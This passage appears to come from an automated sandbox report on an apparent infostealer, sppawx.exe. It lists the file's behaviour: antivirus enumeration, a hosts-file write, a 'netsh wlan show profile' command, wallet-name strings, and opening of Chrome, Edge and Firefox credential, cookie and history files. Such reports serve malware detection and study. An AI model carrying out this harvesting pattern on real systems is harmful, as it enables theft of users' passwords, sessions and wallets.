              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A31D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF79A31D080
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A335C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF79A335C70
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256F48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,103_2_00007FF6256F48CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Users\user\Desktop\sppawx.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000003.1299449724.00000213D8524000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1299449724.00000213D8522000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1748349929.0000018C7F317000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1739009557.0000018C01A4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: sppawx.exe PID: 7808, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: sppawx.exe PID: 7860, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI78082\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: sppawx.exe PID: 7860, type: MEMORYSTR
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: LfJaxx
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\IconsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons MaskableJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\c6rta27r.defaultJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons MonochromeJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\d5610d20-4a84-40b4-96b3-9660f248e6a5Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfakJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldoomlJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons MaskableJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons MaskableJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\IconsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\IconsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibagJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons MonochromeJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\IconsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons MonochromeJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\IconsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons MonochromeJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons MonochromeJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons MaskableJump to behavior
